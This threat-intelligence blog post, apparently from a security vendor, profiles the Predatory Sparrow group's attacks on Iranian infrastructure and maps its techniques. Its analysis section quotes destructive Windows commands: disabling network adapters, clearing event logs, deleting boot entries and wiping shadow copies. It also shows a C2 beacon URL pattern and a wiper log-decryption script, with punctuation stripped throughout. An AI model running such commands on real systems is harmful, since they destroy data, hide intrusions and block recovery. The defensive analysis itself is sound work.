Predatory Sparrow Inside the Cyber Warfare Targeting Irans Critical Infrastructure

pLAST UPDATED ON NOVEMBER 04 2025ppPredatory Sparrow is a cybersabotage group known for its highly disruptive operations with a particular focus on targeting Iranian infrastructure and institutions The group has publicly claimed responsibility for a series of highprofile cyberattacks against various sectors in Iran including critical infrastructure government organizations and financial institutions Their operations are often marked by substantial operational disruption deliberate data destruction and provocative public messaging aimed at taunting their targets Analysts widely believe that Predatory Sparrow is affiliated with Israel operating within the broader context of the ongoing cyber shadow war between the two nations which has seen both offensive and defensive cyber operations unfold over the past decadeppThe group has demonstrated a broad capability to impact diverse segments of Irans national infrastructure highlighting its sophisticated operational reach One of their most notable operations involved Irans national railway system where cyberattacks led to widespread paralysis and significant operational delays illustrating the groups ability to disrupt essential public services Predatory Sparrow has also conducted attacks on Iranian industrial targets such as steel companies causing operational disruptions and triggering fires further emphasizing the destructive nature of their campaigns In the financial sector the group has targeted major institutions including Bank Sepah and the Nobitex cryptocurrency exchange In a particularly highprofile financial attack Predatory Sparrow claimed to have burned 90 million in cryptocurrency and published Nobitexs entire source code infrastructure documentation and internal privacy research and development 1 a move that exposed both operational vulnerabilities and sensitive intellectual property These actions are widely interpreted as part of a broader strategy to destabilize Iran disrupt critical operations and respond to perceived Iranian cyber or geopolitical aggressionsppIn this post we will explore the major historical operations of Predatory Sparrow highlight their notable attacks on Irans critical infrastructure and financial systems and examine the groups tactics techniques and procedures TTPs to understand how they conduct disruptive cyber operations In the end we will show how Picus helps defend against this groupppSimulate APT Attacks with 14Day Free Trial of Picus PlatformppSeptember 2019 A cyberattack targeted Alfadelex Trading a Syrian company offering currency exchange and money transfer services 2ppJanuary 2020 Cham Wings Airlines a privately owned Syrian airline was attacked 2ppFebruary April 2020 The network infrastructures of Afrada and the Katerji Group both Syrianbased firms were seized 2ppNovember 2020 Predatory Sparrow issued a threat to attack the Banias Oil Refinery in Syria though it remains uncertain whether the attack took place 2ppJuly 2021 Predatory Sparrow attacked Irans national railway system disrupting services and displaying messages like cyberattack on station boards This attack utilized the Meteor wiper malware 2pp27 June 2022 The group claimed responsibility for a cyberattack on an Iranian steel manufacturing plant The advanced operation triggered a major fire at the site leading to significant physical damageppDecember 2023 Predatory Sparrow claimed that it was behind a cyberattack that disrupted a large number of gas stations across Iran In a statement posted on X formerly Twitter the group said the operation had disabled most of Irans fuel pumps describing it as a retaliatory move against the actions of the Islamic Republic and its regional proxies 3pp17 June 2025 Soon after Israeli airstrikes on Iran a Predatory Sparrow cyberattack targeted the stateowned Bank Sepah disrupting its services The group claimed to have erased the banks data and accused it of financing Irans military The group additionally claimed responsibility for a strike on the Iranian cryptocurrency exchange Nobitex the next day in which they took 90 million in crypto assets and rendered them unrecoverable by transferring them to inaccessible addresses 1ppIn a Predatory Sparrow attack against Iran researchers found a setupbat script that performs host discovery by checking the machines hostname against PISAPP PISMOB WSUSPROXY and PISDB if a match is found it aborts and removes the malicious folder With this behaviour the malware specifically avoids executing on hosts with PIS Passenger Information System namessystems that update platform boardsensuring the attackers message will be displayed properly on those publicfacing devices 2ppAdversaries may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code Predatory Sparrows msrunbat one of the scripts used in the attack on Iranian Railways and the Ministry of Roads and Urban Development is responsible for unleashing a wiper it moves wiperrelated files to Ctemp The script then creates a scheduled task named mstask configured to run the wiper a single time at 235500 2ppPredatory Sparrow used a sequence of Windows batch files setupbat updatebat started by setupbat where updatebat uses the hardcoded password hackemall to unpack the nextstage scripts cachebat msrunbat and bcdbat This activity uses native Windows batch scripting to stage and execute multistage payloads and the extracted cachebat disables all network adapters on the machine with the command 2pppowershell Command GetWmiObject class Win32NetworkAdapter ForEach If NetEnabled Disable NULppBoth attacks in Syria by Predatory Sparrow began with a VBS dropper resolvevbs that extracted a passwordprotected RAR to CProgram FilesWindows NTAccessories containing a second RAR and three VBS scripts Resolvevbs executed those scripts sequentially the first enumerated installed programs to detect Kaspersky and attempted to uninstall it using hardcoded domain credentials The second checked for Kasperskys avpexe and attempted to remove its license and the final script extracted the secondstage RAR and executed its contained executable a Stardust wiper variant 2ppAttackers often encrypt or encode file contents to hide malicious artifacts and evade detection during intrusions The Meteor wiper attributed to the Predatory Sparrow group used an encrypted configuration file named msconfconf and also stored encrypted log files during its Irantargeted attacks A helper script to decrypt the configuration file and logs is provided below 2ppfrom malduck import xor u32def decodebufferbuf key    results     for kv in enumeratebuf        XOR is rolled by the index of the encrypted character        results chr k 256 keyk lenkey v 0xff    return resultsdef decodelogfilefilepath    content openfilepathrbread    key baceg modified abcdz because of shifting indexes    offset 0    while offset lencontent        sz u32xorkey contentoffsetoffset4 4        printdecodebuffercontentoffsetoffsetsz babcdz        offset szdef decodeconfigfilepath keybabcdz    content openfilepathrbread    return decodebuffercontent keyppA script named  bcdbat used by Predatory Sparrow leverages wevtutil to delete Security System and Application Event Viewer logs effectively erasing forensic evidence of activity 2 With administrator privileges the event logs can be cleared with the following utility commandsppwevtutil cl systemwevtutil cl applicationwevtutil cl securityppPredatory Sparrow probes for thirdparty antivirus Kaspersky and when not found targets builtin protections It has been observed to add attackrelated files and folders to Windows Defenders exclusion list This behavior enables persistence and execution with a reduced chance of detection 2ppWhile some VBS scripts run they issue GET requests to a commandandcontrol server to report progress using URLs of the formpphttpsCC IPprogressphphndtstrsppThe query parameters transmit the host name hn current timestamp dt the execution step st and information about whether Kaspersky AV is running rs with the CC IP varying between attacks 2ppAdversaries may transfer tools or other files from external systems into a compromised environment for example a batch file used by the Predatory Sparrow Group downloads a CAB archive envcab from the internal path railwaysirsysvolrailwaysirscriptsenvcab and the use of that specific path indicates prior knowledge of the environment 2ppThe main payload used by Predatory Sparrow against Iranian Railways and the Ministry of Roads and Urban Development is an executable named msappexe a wiper designed to render infected machines unusable by locking them and wiping their contents Upon execution the malware hides its console window to reduce the chance of detection The program records the phrase Meteor has started to an encrypted log file suggesting the malwares internal name is Meteor 2 ppA malicious bcdbat used by the threat actor Predatory Sparrow attempts to sabotage the Windows boot process by overwriting the boot configuration and then removing existing boot entries via the builtin BCDEdit utility using the command below 2ppfor F tokens2 j in comspec c bcdedit v findstr identifier do bcdedit delete j fppAlso native Windows utilities have been abused by adversaries to disable system recovery features For example vssadminexe or Windows Management Instrumentation WMIC can remove all volume shadow copies The Predatory Sparrow wiper attempts to remove shadow copies by running both the vssadmin and wmic commands 2ppvssadminexe delete shadows all quietwmicexe shadowcopy deleteppWe also strongly suggest simulating Predatory Sparrow Attacks to test the effectiveness of your security controls against reallife cyber attacks using the Picus Security Validation Platform You can also test your defenses against hundreds of other threat groups within minutes with a 14day free trial of the Picus PlatformppPicus Threat Library includes the following threats for Predatory SparrowppThreat IDppThreat NameppAttack Modulepp77438ppPredatory Sparrow Threat Group CampaignppWindows EndpointppStart simulating emerging threats today and get actionable mitigation insights with a 14day free trial of the Picus Security Validation PlatformppPredatory Sparrow is also known as Gonjeshke Darande IndrappReferencespp1 Inside the Nobitex Breach What the Leaked Source Code Reveals About Irans Crypto Infrastructure Accessed Oct 15 2025 Online Available httpswwwtrmlabscomresourcesbloginsidethenobitexbreachwhattheleakedsourcecoderevealsaboutiranscryptoinfrastructure pp2 Indra Hackers Behind Recent Attacks on Iran Check Point Research Accessed Oct 15 2025 Online Available httpsresearchcheckpointcom2021indrahackersbehindrecentattacksoniran pp3 E Groll Israellinked hacking group claims attack on Iranian gas pumps CyberScoop Accessed Oct 15 2025 Online Available httpscyberscoopcomisraelirancyberattackhouthipp



ppPlatformppUse CasesppResourcesppCompanyppSubscribe to Our NewsletterppContact Uspp
infopicussecuritycom
pp
Schedule a meeting

pp
Hey Al learn about us

pp
2025 Copyright All rights reserved
p